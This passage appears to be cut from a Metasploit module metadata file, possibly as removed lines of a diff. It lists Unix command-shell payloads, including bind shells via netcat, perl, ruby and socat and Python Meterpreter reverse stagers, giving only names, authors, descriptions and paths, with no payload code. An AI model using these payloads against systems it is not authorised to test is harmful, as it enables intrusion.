"/modules/payloads/singles/cmd/unix/bind_lua.rb", - "is_install_path": true, - "ref_name": "cmd/unix/bind_lua", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/bind_netcat": { - "name": "Unix Command Shell, Bind TCP (via netcat)", - "fullname": "payload/cmd/unix/bind_netcat", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "m-1-k-3", - "egypt ", - "juan vazquez " - ], - "description": "Listen for a connection and spawn a command shell via netcat", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/bind_netcat.rb", - "is_install_path": true, - "ref_name": "cmd/unix/bind_netcat", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/bind_netcat_gaping": { - "name": "Unix Command Shell, Bind TCP (via netcat -e)", - "fullname": "payload/cmd/unix/bind_netcat_gaping", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Listen for a connection and spawn a command shell via netcat", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/bind_netcat_gaping.rb", - "is_install_path": true, - "ref_name": "cmd/unix/bind_netcat_gaping", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 
1, - "staged": false - }, - "payload_cmd/unix/bind_netcat_gaping_ipv6": { - "name": "Unix Command Shell, Bind TCP (via netcat -e) IPv6", - "fullname": "payload/cmd/unix/bind_netcat_gaping_ipv6", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Listen for a connection and spawn a command shell via netcat", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/bind_netcat_gaping_ipv6.rb", - "is_install_path": true, - "ref_name": "cmd/unix/bind_netcat_gaping_ipv6", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/bind_nodejs": { - "name": "Unix Command Shell, Bind TCP (via nodejs)", - "fullname": "payload/cmd/unix/bind_nodejs", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "joev " - ], - "description": "Continually listen for a connection and spawn a command shell via nodejs", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/bind_nodejs.rb", - "is_install_path": true, - "ref_name": "cmd/unix/bind_nodejs", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/bind_perl": { - "name": "Unix Command Shell, Bind TCP (via Perl)", - "fullname": "payload/cmd/unix/bind_perl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Samy ", - 
"cazz " - ], - "description": "Listen for a connection and spawn a command shell via perl", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/bind_perl.rb", - "is_install_path": true, - "ref_name": "cmd/unix/bind_perl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/bind_perl_ipv6": { - "name": "Unix Command Shell, Bind TCP (via perl) IPv6", - "fullname": "payload/cmd/unix/bind_perl_ipv6", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Samy ", - "cazz " - ], - "description": "Listen for a connection and spawn a command shell via perl", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb", - "is_install_path": true, - "ref_name": "cmd/unix/bind_perl_ipv6", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/bind_r": { - "name": "Unix Command Shell, Bind TCP (via R)", - "fullname": "payload/cmd/unix/bind_r", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "RageLtMan " - ], - "description": "Continually listen for a connection and spawn a command shell via R", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": 
"/modules/payloads/singles/cmd/unix/bind_r.rb", - "is_install_path": true, - "ref_name": "cmd/unix/bind_r", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/bind_ruby": { - "name": "Unix Command Shell, Bind TCP (via Ruby)", - "fullname": "payload/cmd/unix/bind_ruby", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "kris katterjohn " - ], - "description": "Continually listen for a connection and spawn a command shell via Ruby", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/bind_ruby.rb", - "is_install_path": true, - "ref_name": "cmd/unix/bind_ruby", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/bind_ruby_ipv6": { - "name": "Unix Command Shell, Bind TCP (via Ruby) IPv6", - "fullname": "payload/cmd/unix/bind_ruby_ipv6", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "kris katterjohn " - ], - "description": "Continually listen for a connection and spawn a command shell via Ruby", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/bind_ruby_ipv6.rb", - "is_install_path": true, - "ref_name": "cmd/unix/bind_ruby_ipv6", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false 
- }, - "payload_cmd/unix/bind_socat_sctp": { - "name": "Unix Command Shell, Bind SCTP (via socat)", - "fullname": "payload/cmd/unix/bind_socat_sctp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "RageLtMan " - ], - "description": "Creates an interactive shell via socat", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-04-27 16:21:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/bind_socat_sctp.rb", - "is_install_path": true, - "ref_name": "cmd/unix/bind_socat_sctp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/bind_socat_udp": { - "name": "Unix Command Shell, Bind UDP (via socat)", - "fullname": "payload/cmd/unix/bind_socat_udp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "RageLtMan " - ], - "description": "Creates an interactive shell via socat", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/bind_socat_udp.rb", - "is_install_path": true, - "ref_name": "cmd/unix/bind_socat_udp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/bind_stub": { - "name": "Unix Command Shell, Bind TCP (stub)", - "fullname": "payload/cmd/unix/bind_stub", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Listen for a connection and spawn a command shell (stub only, no payload)", - 
"references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/bind_stub.rb", - "is_install_path": true, - "ref_name": "cmd/unix/bind_stub", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/bind_zsh": { - "name": "Unix Command Shell, Bind TCP (via Zsh)", - "fullname": "payload/cmd/unix/bind_zsh", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Doug Prostko ", - "Wang Yihang " - ], - "description": "Listen for a connection and spawn a command shell via Zsh. Note: Although Zsh is\n often available, please be aware it isn't usually installed by default.", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/bind_zsh.rb", - "is_install_path": true, - "ref_name": "cmd/unix/bind_zsh", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/generic": { - "name": "Unix Command, Generic Command Execution", - "fullname": "payload/cmd/unix/generic", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Executes the supplied command", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/generic.rb", - 
"is_install_path": true, - "ref_name": "cmd/unix/generic", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/interact": { - "name": "Unix Command, Interact with Established Connection", - "fullname": "payload/cmd/unix/interact", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Interacts with a shell on an established socket connection", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/interact.rb", - "is_install_path": true, - "ref_name": "cmd/unix/interact", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/pingback_bind": { - "name": "Unix Command Shell, Pingback Bind TCP (via netcat)", - "fullname": "payload/cmd/unix/pingback_bind", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "asoto-r7" - ], - "description": "Accept a connection, send a UUID, then exit", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/pingback_bind.rb", - "is_install_path": true, - "ref_name": "cmd/unix/pingback_bind", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/pingback_reverse": { - "name": "Unix Command Shell, Pingback Reverse TCP 
(via netcat)", - "fullname": "payload/cmd/unix/pingback_reverse", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "asoto-r7" - ], - "description": "Creates a socket, send a UUID, then exit", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/pingback_reverse.rb", - "is_install_path": true, - "ref_name": "cmd/unix/pingback_reverse", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/python/exec": { - "name": "Python Exec, Python Execute Command", - "fullname": "payload/cmd/unix/python/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Execute a Python payload from a command.\n\nExecute an arbitrary OS command. 
Compatible with Python 2.7 and 3.4+.", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-11-04 00:33:03 +0000", - "path": "/modules/payloads/adapters/cmd/unix/python.rb", - "is_install_path": true, - "ref_name": "cmd/unix/python/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/unix/python", - "adapted_refname": "python/exec", - "staged": false - }, - "payload_cmd/unix/python/meterpreter/bind_tcp": { - "name": "Python Exec, Python Meterpreter, Python Bind TCP Stager", - "fullname": "payload/cmd/unix/python/meterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nListen for a connection", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-11-04 00:33:03 +0000", - "path": "/modules/payloads/adapters/cmd/unix/python.rb", - "is_install_path": true, - "ref_name": "cmd/unix/python/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/unix/python", - "adapted_refname": "python/meterpreter/bind_tcp", - "staged": true, - "stage_refname": "python/meterpreter", - "stager_refname": "python/bind_tcp" - }, - "payload_cmd/unix/python/meterpreter/bind_tcp_uuid": { - "name": "Python Exec, Python Meterpreter, Python Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/unix/python/meterpreter/bind_tcp_uuid", - "aliases": [], 
- "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "OJ Reeves" - ], - "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nListen for a connection with UUID Support", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-11-04 00:33:03 +0000", - "path": "/modules/payloads/adapters/cmd/unix/python.rb", - "is_install_path": true, - "ref_name": "cmd/unix/python/meterpreter/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/unix/python", - "adapted_refname": "python/meterpreter/bind_tcp_uuid", - "staged": true, - "stage_refname": "python/meterpreter", - "stager_refname": "python/bind_tcp_uuid" - }, - "payload_cmd/unix/python/meterpreter/reverse_http": { - "name": "Python Exec, Python Meterpreter, Python Reverse HTTP Stager", - "fullname": "payload/cmd/unix/python/meterpreter/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nTunnel communication over HTTP", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-11-04 00:33:03 +0000", - "path": "/modules/payloads/adapters/cmd/unix/python.rb", - "is_install_path": true, - "ref_name": "cmd/unix/python/meterpreter/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - 
"adapter_refname": "cmd/unix/python", - "adapted_refname": "python/meterpreter/reverse_http", - "staged": true, - "stage_refname": "python/meterpreter", - "stager_refname": "python/reverse_http" - }, - "payload_cmd/unix/python/meterpreter/reverse_https": { - "name": "Python Exec, Python Meterpreter, Python Reverse HTTPS Stager", - "fullname": "payload/cmd/unix/python/meterpreter/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nTunnel communication over HTTP using SSL", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-11-04 00:33:03 +0000", - "path": "/modules/payloads/adapters/cmd/unix/python.rb", - "is_install_path": true, - "ref_name": "cmd/unix/python/meterpreter/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/unix/python", - "adapted_refname": "python/meterpreter/reverse_https", - "staged": true, - "stage_refname": "python/meterpreter", - "stager_refname": "python/reverse_https" - }, - "payload_cmd/unix/python/meterpreter/reverse_tcp": { - "name": "Python Exec, Python Meterpreter, Python Reverse TCP Stager", - "fullname": "payload/cmd/unix/python/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nConnect back to the attacker", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - 
"autofilter_services": null, - "targets": null, - "mod_time": "2022-11-04 00:33:03 +0000", - "path": "/modules/payloads/adapters/cmd/unix/python.rb", - "is_install_path": true, - "ref_name": "cmd/unix/python/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/unix/python", - "adapted_refname": "python/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "python/meterpreter", - "stager_refname": "python/reverse_tcp" - }, - "payload_cmd/unix/python/meterpreter/reverse_tcp_ssl": { - "name": "Python Exec, Python Meterpreter, Python Reverse TCP SSL Stager", - "fullname": "payload/cmd/unix/python/meterpreter/reverse_tcp_ssl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "Ben Campbell ", - "RageLtMan" - ], - "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nReverse Python connect back stager using SSL", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-11-04 00:33:03 +0000", - "path": "/modules/payloads/adapters/cmd/unix/python.rb", - "is_install_path": true, - "ref_name": "cmd/unix/python/meterpreter/reverse_tcp_ssl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/unix/python", - "adapted_refname": "python/meterpreter/reverse_tcp_ssl", - "staged": true, - "stage_refname": "python/meterpreter", - "stager_refname": "python/reverse_tcp_ssl" - }, - "payload_cmd/unix/python/meterpreter/reverse_tcp_uuid": { - "name": "Python Exec, Python Meterpreter, Python Reverse TCP Stager with UUID Support", - 
"fullname": "payload/cmd/unix/python/meterpreter/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "OJ Reeves" - ], - "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nConnect back to the attacker with UUID Support", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-11-04 00:33:03 +0000", - "path": "/modules/payloads/adapters/cmd/unix/python.rb", - "is_install_path": true, - "ref_name": "cmd/unix/python/meterpreter/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/unix/python", - "adapted_refname": "python/meterpreter/reverse_tcp_uuid", - "staged": true, - "stage_refname": "python/meterpreter", - "stager_refname": "python/reverse_tcp_uuid" - }, - "payload_cmd/unix/python/meterpreter_bind_tcp": { - "name": "Python Exec, Python Meterpreter Shell, Bind TCP Inline", - "fullname": "payload/cmd/unix/python/meterpreter_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Execute a Python payload from a command.\n\nConnect to the victim and spawn a Meterpreter shell", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-11-04 00:33:03 +0000", - "path": "/modules/payloads/adapters/cmd/unix/python.rb", - "is_install_path": true, - "ref_name": "cmd/unix/python/meterpreter_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - 
"payload_type": 8, - "adapter_refname": "cmd/unix/python", - "adapted_refname": "python/meterpreter_bind_tcp", - "staged": false - }, - "payload_cmd/unix/python/meterpreter_reverse_http": { - "name": "Python Exec, Python Meterpreter Shell, Reverse HTTP Inline", - "fullname": "payload/cmd/unix/python/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Execute a Python payload from a command.\n\nConnect back to the attacker and spawn a Meterpreter shell", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-11-04 00:33:03 +0000", - "path": "/modules/payloads/adapters/cmd/unix/python.rb", - "is_install_path": true, - "ref_name": "cmd/unix/python/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/unix/python", - "adapted_refname": "python/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/unix/python/meterpreter_reverse_https": { - "name": "Python Exec, Python Meterpreter Shell, Reverse HTTPS Inline", - "fullname": "payload/cmd/unix/python/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Execute a Python payload from a command.\n\nConnect back to the attacker and spawn a Meterpreter shell", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-11-04 00:33:03 +0000", - "path": "/modules/payloads/adapters/cmd/unix/python.rb", - "is_install_path": true, - "ref_name": "cmd/unix/python/meterpreter_reverse_https", - "check": false, - 
"post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/unix/python", - "adapted_refname": "python/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/unix/python/meterpreter_reverse_tcp": { - "name": "Python Exec, Python Meterpreter Shell, Reverse TCP Inline", - "fullname": "payload/cmd/unix/python/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Execute a Python payload from a command.\n\nConnect back to the attacker and spawn a Meterpreter shell", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-11-04 00:33:03 +0000", - "path": "/modules/payloads/adapters/cmd/unix/python.rb", - "is_install_path": true, - "ref_name": "cmd/unix/python/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/unix/python", - "adapted_refname": "python/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/unix/python/pingback_bind_tcp": { - "name": "Python Exec, Python Pingback, Bind TCP (via python)", - "fullname": "payload/cmd/unix/python/pingback_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "asoto-r7" - ], - "description": "Execute a Python payload from a command.\n\nListens for a connection from the attacker, sends a UUID, then terminates", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-11-04 00:33:03 +0000", - "path": 
"/modules/payloads/adapters/cmd/unix/python.rb", - "is_install_path": true, - "ref_name": "cmd/unix/python/pingback_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/unix/python", - "adapted_refname": "python/pingback_bind_tcp", - "staged": false - }, - "payload_cmd/unix/python/pingback_reverse_tcp": { - "name": "Python Exec, Python Pingback, Reverse TCP (via python)", - "fullname": "payload/cmd/unix/python/pingback_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "asoto-r7" - ], - "description": "Execute a Python payload from a command.\n\nConnects back to the attacker, sends a UUID, then terminates", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-11-04 00:33:03 +0000", - "path": "/modules/payloads/adapters/cmd/unix/python.rb", - "is_install_path": true, - "ref_name": "cmd/unix/python/pingback_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/unix/python", - "adapted_refname": "python/pingback_reverse_tcp", - "staged": false - }, - "payload_cmd/unix/python/shell_bind_tcp": { - "name": "Python Exec, Command Shell, Bind TCP (via python)", - "fullname": "payload/cmd/unix/python/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "mumbai" - ], - "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, encodes with base64 by design. 
Compatible with Python 2.4-2.7 and 3.4+.", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-11-04 00:33:03 +0000", - "path": "/modules/payloads/adapters/cmd/unix/python.rb", - "is_install_path": true, - "ref_name": "cmd/unix/python/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/unix/python", - "adapted_refname": "python/shell_bind_tcp", - "staged": false - }, - "payload_cmd/unix/python/shell_reverse_sctp": { - "name": "Python Exec, Command Shell, Reverse SCTP (via python)", - "fullname": "payload/cmd/unix/python/shell_reverse_sctp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "RageLtMan " - ], - "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, encodes with base64 by design. 
Compatible with Python 2.6-2.7 and 3.4+.", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-11-04 00:33:03 +0000", - "path": "/modules/payloads/adapters/cmd/unix/python.rb", - "is_install_path": true, - "ref_name": "cmd/unix/python/shell_reverse_sctp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/unix/python", - "adapted_refname": "python/shell_reverse_sctp", - "staged": false - }, - "payload_cmd/unix/python/shell_reverse_tcp": { - "name": "Python Exec, Command Shell, Reverse TCP (via python)", - "fullname": "payload/cmd/unix/python/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "Ben Campbell " - ], - "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, encodes with base64 by design. 
